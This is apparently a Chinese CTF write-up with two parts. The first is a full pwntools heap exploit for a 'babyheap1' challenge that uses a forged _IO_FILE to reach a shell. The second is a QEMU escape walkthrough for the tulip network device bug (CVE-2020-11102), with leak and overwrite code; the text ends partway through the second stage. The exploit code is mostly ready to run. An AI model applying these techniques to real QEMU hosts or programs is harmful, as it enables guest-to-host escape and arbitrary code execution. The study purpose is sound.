arch = 64
challenge = './babyheap1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p,"")
gdb.attach(p,"b *$rebase(0x1729)\n")
#pause()

def cmd(op):
sla(">>",str(op))

def add(size,data):
cmd(1)
sla("size",str(size))
sla("name",data)

def edit(index,size,data):
cmd(2)
sla("index",str(index))
sla("size",str(size))
sla("name",data)

def show(index):
cmd(3)
sla("index",str(index))

def dele(index):
cmd(4)
sla("index",str(index))

#debug()
ru("easier\n")
leak_addr = eval(ru("\n"))
heap_base = leak_addr - 0x2a0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

fake_heap_addr = heap_base + 0x2c0
payload = p64(0)+ p64(0xc61)
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

add(0x428,payload) #0
add(0x428,"a"*0x10) #1
add(0x408,"a"*0x10) #2
add(0x4f8,"a"*0x10) #3
add(0x408,"a"*0x10) #4
add(0x408,"a"*0x10) #5
add(0x408,"a"*0x10) #6

edit(2,0x408,b"b"*0x400+p64(0xc60))

dele(3)
add(0x418,"c"*8)
add(0x428,"c"*8)
add(0x408,"c"*8)
dele(1)
add(0x500,"c"*8)

show(7)
ru("\n")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x1ff0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

dele(4)
dele(5)
dele(2)

io_list_all = libc_base + 0x1ff6a0
key = (heap_base + 0xb20)>>12
success("io_list_all >> "+hex(io_list_all))
success("key >> "+hex(key))

libc_system = libc_base + libc.sym["system"]
_IO_wfile_jumps = libc_base + libc.sym["_IO_wfile_jumps"]
success("_IO_wfile_jumps >> "+hex(_IO_wfile_jumps))
success("libc_system >> "+hex(libc_system))

next_chain = 0
fake_io_addr = heap_base + 0x2d0 - 0x10
payload_addr = heap_base
flag_addr = heap_base

fake_IO_FILE = b"/bin/sh\x00" #_flags=rdi
fake_IO_FILE += p64(0)*5
fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE += p64(payload_addr-0xa0)#_IO_backup_base=rdx
fake_IO_FILE += p64(libc_system)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
fake_IO_FILE += p64(flag_addr) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(_IO_wfile_jumps+0x30) # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr

edit(8,0x8,p64(io_list_all ^ key))
add(0x400,"d"*8)
add(0x400,p64(fake_io_addr))

edit(0,8,"/bin/sh\x00")
edit(3,len(fake_IO_FILE),fake_IO_FILE)

cmd(5)

p.interactive()

EscapefromtheEarth 复现

1
2
3
4
5
6
7
8
#!/bin/sh

./qemu-system-x86_64 -L ./dependency -kernel ./vmlinuz-4.15.0-208-generic -initrd ./rootfs.cpio -cpu kvm64,+smep \
-m 64M \
-monitor none \
-device tulip \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-nographic
1
2
3
4
5
6
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
/sbin/mdev -s
insmod /tulip.ko
exec /bin/sh

启动内核发现是 root 权限:

1
2
3
4
/ # whoami
root
/ # id
uid=0(root) gid=0
  • 本题目提供了 qemu-system-x86_64,那极有可能是 qemu 逃逸

漏洞分析

qemu 逃逸一般在如下4个函数中出现 BUG:

  • pmio_read:读设备寄存器的物理地址(使用 in() 触发)
  • pmio_write:写设备寄存器的物理地址(使用 out() 触发)
  • mmio_read:读设备寄存器的虚拟地址(使用 mmap 映射物理内存,读这片区域时触发)
  • mmio_write:写设备寄存器的虚拟地址(使用 mmap 映射物理内存,写这片区域时触发)

但本题目并没有注册 mmio / pmio 的相关函数,题目提供的线索指向 CVE-2020-11102,并提供的 qemu 的编译过程:

1
2
3
4
5
6
wget https://download.qemu.org/qemu-4.2.0.tar.xz
xz -d ./qemu-4.2.0.tar.xz
tar -xvf ./qemu-4.2.0.tar
cp ./tulip.c ./qemu-4.2.0/hw/net/
#Then build qemu as normal
...
  • QEMU 4.2.0 版本中的 hw/net/tulip.c 文件存在缓冲区错误漏洞
  • 攻击者可利用该漏洞造成 QEMU 进程崩溃或可能以 QEMU 进程权限执行任意代码

于是我们去下载 QEMU 4.2.1 的源码,用 diff 判断一下程序修改了哪里:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
--- tulip.c	2023-03-29 14:50:12.000000000 +0800
+++ tulip2.c 2020-06-26 02:12:17.000000000 +0800
@@ -38,9 +38,9 @@

uint8_t rx_frame[2048];
uint8_t tx_frame[2048];
- int tx_frame_len;
- int rx_frame_len;
- int rx_frame_size;
+ uint16_t tx_frame_len;
+ uint16_t rx_frame_len;
+ uint16_t rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
@@ -58,9 +58,9 @@
VMSTATE_UINT64(current_tx_desc, TULIPState),
VMSTATE_BUFFER(rx_frame, TULIPState),
VMSTATE_BUFFER(tx_frame, TULIPState),
- VMSTATE_INT32(rx_frame_len, TULIPState),
- VMSTATE_INT32(tx_frame_len, TULIPState),
- VMSTATE_INT32(rx_frame_size, TULIPState),
+ VMSTATE_UINT16(rx_frame_len, TULIPState),
+ VMSTATE_UINT16(tx_frame_len, TULIPState),
+ VMSTATE_UINT16(rx_frame_size, TULIPState),
VMSTATE_UINT32(rx_status, TULIPState),
VMSTATE_UINT8_2DARRAY(filter, TULIPState, 16, 6),
VMSTATE_END_OF_LIST()
@@ -170,6 +170,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -181,6 +182,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -227,7 +229,8 @@

trace_tulip_receive(buf, size);

- if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
+ if (size < 14 || size > sizeof(s->rx_frame) - 4
+ || s->rx_frame_len || tulip_rx_stopped(s)) {
return 0;
}

@@ -275,7 +278,6 @@
return tulip_receive(qemu_get_nic_opaque(nc), buf, size);
}

-
static NetClientInfo net_tulip_info = {
.type = NET_CLIENT_DRIVER_NIC,
.size = sizeof(NICState),
@@ -558,7 +560,7 @@
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
- } else {
+ } else if (s->tx_frame_len <= sizeof(s->tx_frame)) {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
@@ -570,23 +572,31 @@
}
}

-static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
+static int tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

+ if (s->tx_frame_len + len1 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

+ if (s->tx_frame_len + len2 > sizeof(s->tx_frame)) {
+ return -1;
+ }
if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
+
+ return 0;
}

static void tulip_setup_filter_addr(TULIPState *s, uint8_t *buf, int n)
@@ -651,13 +661,15 @@

static void tulip_xmit_list_update(TULIPState *s)
{
+#define TULIP_DESC_MAX 128
+ uint8_t i = 0;
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) {
return;
}

- for (;;) {
+ for (i = 0; i < TULIP_DESC_MAX; i++) {
tulip_desc_read(s, s->current_tx_desc, &desc);
tulip_dump_tx_descriptor(s, &desc);

@@ -675,10 +687,10 @@
s->tx_frame_len = 0;
}

- tulip_copy_tx_buffers(s, &desc);
-
- if (desc.control & TDES1_LS) {
- tulip_tx(s, &desc);
+ if (!tulip_copy_tx_buffers(s, &desc)) {
+ if (desc.control & TDES1_LS) {
+ tulip_tx(s, &desc);
+ }
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);

可以发现函数 tulip_copy_tx_buffers 中缺少了一个检查,核心代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
  • tulip_copy_tx_buffers 是一个 TULIP 库中的函数,用于将设备驱动程序中的数据传输到网络适配器的物理内存中
  • 当我们多次调用 tulip_copy_tx_buffers 时,s->tx_frame_len 可能被加到一个非常大的值

未对虚拟机传入的长度字段进行校验,导致产生了针对 tx_framerx_framd 的数组越界写,这两个数组都是结构体 TULIPState 的条目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
typedef struct TULIPState
{
PCIDevice dev; /* PCI设备结构体的指针,用于存储设备的硬件信息 */
MemoryRegion io; /* 内存区域结构体的指针,用于存储设备的I/O地址空间 */
MemoryRegion memory; /* 内存区域结构体的指针,用于存储设备的内存地址空间 */
NICConf c;
qemu_irq irq; /* qemu中断结构体的指针,用于存储网络适配器的中断 */
NICState *nic;
eeprom_t *eeprom;
uint32_t csr[16]; /* 16个32位寄存器数组,用于存储网络适配器的寄存器值 */

/* state for MII */
uint32_t old_csr9;
uint32_t mii_word;
uint32_t mii_bitcnt;

hwaddr current_rx_desc; /* 接收描述符的硬件地址 */
hwaddr current_tx_desc; /* 发送描述符的硬件地址 */

uint8_t rx_frame[2048]; /* 接收缓冲区,用于存储接收到的数据 */
uint8_t tx_frame[2048]; /* 发送缓冲区,用于存储待发送的数据 */
int tx_frame_len; /* 发送缓冲区中已发送的数据长度 */
int rx_frame_len; /* 接收缓冲区中已接收的数据长度 */
int rx_frame_size; /* 接收缓冲区中数据帧的大小 */

uint32_t rx_status; /* 接收状态寄存器,用于存储接收状态信息 */
uint8_t filter[16][6]; /* 一个16行6列的数组,用于存储过滤器 */
} TULIPState;

程序分析

本题目找不到 tulip.ko 的设备标识符:

1
2
3
/ # find . -name tulip
./sys/bus/pci/drivers/tulip
./sys/module/tulip

IDA 分析发现,tulip.ko 只注册了驱动,但是没有注册设备标识符:(其实 Qemu 逃逸类题目和内核题目不同,大多数时候都不需要设备标识符)

1
2
3
4
5
6
7
8
9
10
11
12
13
__int64 __fastcall tulip_init(__int64 a1, __int64 a2)
{
_fentry__(a1, a2);
printk(&unk_94CF, version);
if ( !csr0 )
{
printk(&unk_A6F0, version);
csr0 = 0xA04800;
}
tulip_rx_copybreak = rx_copybreak;
tulip_max_interrupt_work = max_interrupt_work;
return _pci_register_driver(&tulip_driver, &_this_module, "tulip");
}

先使用 info pci 查看 qemu 的 PCI 设备:

1
2
3
4
5
6
7
Bus  0, device   4, function 0:
Ethernet controller: PCI device 1011:0019
PCI subsystem 103c:104f
IRQ 11.
BAR0: I/O at 0xc000 [0xc07f].
BAR1: 32 bit memory at 0xfebf1000 [0xfebf107f].
id ""
  • 需要先在 run.sh 中添加 -monitor telnet:127.0.0.1:4444,server,nowait 选项
  • 然后使用 nc 127.0.0.1 4444info pci 进行查看

基于 0xc000 我们就可以使用 pmio 来调用 tulip_readtulip_write

1
2
3
4
5
6
7
8
9
static const MemoryRegionOps tulip_ops = {
.read = tulip_read,
.write = tulip_write,
.endianness = DEVICE_LITTLE_ENDIAN,
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};

函数 tulip_write 的功能较为复杂,这里只分析我们需要的部分:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#define CSR6_FC         BIT(12)
#define CSR6_ST BIT(13)

static void tulip_write(void *opaque, hwaddr addr,
uint64_t data, unsigned size)
{
TULIPState *s = opaque;
trace_tulip_reg_write(addr, tulip_reg_name(addr), size, data);

switch (addr)
{
......

case CSR(3):
s->csr[3] = data & ~3ULL;
s->current_rx_desc = s->csr[3]; /* 设置接收描述符的硬件地址 */
qemu_flush_queued_packets(qemu_get_queue(s->nic)); /* 刷新网络适配器队列 */
break;

case CSR(4):
s->csr[4] = data & ~3ULL;
s->current_tx_desc = s->csr[4]; /* 设置接收描述符的硬件地址 */
tulip_xmit_list_update(s); /* 间接调用漏洞函数 */
break;

case CSR(5):
/* Status register, write clears bit */
s->csr[5] &= ~(data & (CSR5_TI | CSR5_TPS | CSR5_TU | CSR5_TJT |
CSR5_LNP_ANC | CSR5_UNF | CSR5_RI | CSR5_RU |
CSR5_RPS | CSR5_RWT | CSR5_ETI | CSR5_GTE |
CSR5_LNF | CSR5_FBE | CSR5_ERI | CSR5_AIS |
CSR5_NIS | CSR5_GPI | CSR5_LC));
tulip_update_int(s);
break;

case CSR(6):
s->csr[6] = data;
if (s->csr[6] & CSR6_SR)
{
tulip_update_rs(s, CSR5_RS_RUNNING_WAIT_RECEIVE);
qemu_flush_queued_packets(qemu_get_queue(s->nic));
}
else
{
tulip_update_rs(s, CSR5_RS_STOPPED);
}

if (s->csr[6] & CSR6_ST)
{
tulip_update_ts(s, CSR5_TS_SUSPENDED);
tulip_xmit_list_update(s); /* 间接调用漏洞函数 */
}
else
{
tulip_update_ts(s, CSR5_TS_STOPPED);
}
break;

......

default:
qemu_log_mask(LOG_GUEST_ERROR, "%s: write to CSR at unknown address "
"0x%" PRIx64 "\n",
__func__, addr);
break;
}
}

函数 tulip_xmit_list_update 会间接调用漏洞函数,我们可以分析一下调用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
static void tulip_xmit_list_update(TULIPState *s)
{
struct tulip_descriptor desc;

if (tulip_ts(s) != CSR5_TS_SUSPENDED) /* 如果网络适配器不处于暂停状态,则返回 */
{
return;
}

for (;;)
{
tulip_desc_read(s, s->current_tx_desc, &desc); /* 从s->current_tx_desc中读取网络适配器的描述符,并写入desc */
tulip_dump_tx_descriptor(s, &desc); /* 执行PCI DMA操作 */

......

if (desc.control & TDES1_SET)
{
......
}
else
{
......
tulip_copy_tx_buffers(s, &desc); /* 调用漏洞函数 */
if (desc.control & TDES1_LS)
{
tulip_tx(s, &desc); /* 将数据发送到网络适配器 */
}
}
tulip_desc_write(s, s->current_tx_desc, &desc);
tulip_next_tx_descriptor(s, &desc);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

if (len1)
{
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
/* 从地址desc->buf_addr1处,传输数据到主机内存tx_frame + tx_frame_len */
s->tx_frame_len += len1;
}

if (len2)
{
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

  • 调用链为:tulip_write -> tulip_xmit_list_update -> tulip_copy_tx_buffers -> pci_dma_read
  • 条件为:tulip_ts(s) == CSR5_TS_SUSPENDED

在设置了 TDES1_LS 后,则会调用 tulip_tx 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static void tulip_tx(TULIPState *s, struct tulip_descriptor *desc)
{
if (s->tx_frame_len) {
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
} else {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
}

if (desc->control & TDES1_IC) {
s->csr[5] |= CSR5_TI;
tulip_update_int(s);
}
}

  • 在通过 s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK 条件后则会调用 tulip_receive
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
static ssize_t tulip_receive(TULIPState *s, const uint8_t *buf, size_t size)
{
struct tulip_descriptor desc;

trace_tulip_receive(buf, size);

if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
return 0;
}

if (!tulip_filter_address(s, buf)) {
return size;
}

do {
tulip_desc_read(s, s->current_rx_desc, &desc);
tulip_dump_rx_descriptor(s, &desc);

if (!(desc.status & RDES0_OWN)) {
s->csr[5] |= CSR5_RU;
tulip_update_int(s);
return s->rx_frame_size - s->rx_frame_len;
}
desc.status = 0;

if (!s->rx_frame_len) {
s->rx_frame_size = size + 4;
s->rx_status = RDES0_LS |
((s->rx_frame_size & RDES0_FL_MASK) << RDES0_FL_SHIFT);
desc.status |= RDES0_FS;
memcpy(s->rx_frame, buf, size);
s->rx_frame_len = s->rx_frame_size;
}

tulip_copy_rx_bytes(s, &desc); /* 将接收到的数据从接收缓冲区复制到用户提供的缓冲区中 */

if (!s->rx_frame_len) {
desc.status |= s->rx_status;
s->csr[5] |= CSR5_RI;
tulip_update_int(s);
}
tulip_dump_rx_descriptor(s, &desc);
tulip_desc_write(s, s->current_rx_desc, &desc);
tulip_next_rx_descriptor(s, &desc);
} while (s->rx_frame_len);
return size;
}

函数 tulip_copy_rx_bytes 的作用和 tulip_copy_tx_buffers 相反:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
int len;

if (s->rx_frame_len && len1)
{
if (s->rx_frame_len > len1)
{
len = len1;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
/* 从主机内存rx_frame + rx_frame_size - rx_frame_len处读取数据 */
s->rx_frame_len -= len;
}

if (s->rx_frame_len && len2)
{
if (s->rx_frame_len > len2)
{
len = len2;
}
else
{
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
}
  • tulip_copy_rx_bytes 中也同样没有检查 size 范围,可以将 rx_frame 后的数据读取到用户空间

核心结构体 tulip_descriptor 的代码如下:

1
2
3
4
5
6
struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};

入侵思路

tulip_xmit_list_update 中会从 current_tx_desc 中读取网络适配器的描述符:

1
2
tulip_desc_read(s, s->current_tx_desc, &desc); /* 从s->current_tx_desc中读取网络适配器的描述符,并写入desc */
tulip_dump_tx_descriptor(s, &desc);
  • 此时 tulip_desc_read 函数需要传入物理地址

我们可以通过 /proc/self/pagemap 计算出物理地址:

1
2
3
4
5
6
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}

1
2
3
4
uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}

1
2
3
4
5
6
7
8
9
10
11
12
uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

1
2
3
4
5
6
uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

如果我们将 tx_frame_len 设置为 0x800,那么接下来往 tx_frame[2048] 中写的数据就可能会向下溢出

下面是测试代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

接着我们就可以通过 pci_dma_read 函数修改 TULIPState->tx_frame 往后的数据,然后利用 pci_dma_write 泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1));
/* 0x800: 使"s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK"成立,从而使tulip_tx能够调用tulip_receive */
/* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */
/* (1u << 1)为CSR6_SR: 设置CSR5_RS_RUNNING_WAIT_RECEIVE */

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa); /* 设置rx_desc */

struct oob_data { /* 描述TULIPState->tx_frame的后续数据 */
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x400 - len1; /* 伪造>tx_frame_len为0x400 */
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900; /* 使rx_frame发生溢出 */
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

泄露 libc_base 和 heap_base 以后,我们就可以劫持并伪造 TULIPState->MemoryRegion->MemoryRegionOps 来执行我们需要的函数:

1
2
3
4
5
6
struct MemoryRegion {
......
const MemoryRegionOps *ops;
......
};

测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70; /* 向上溢出 */
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

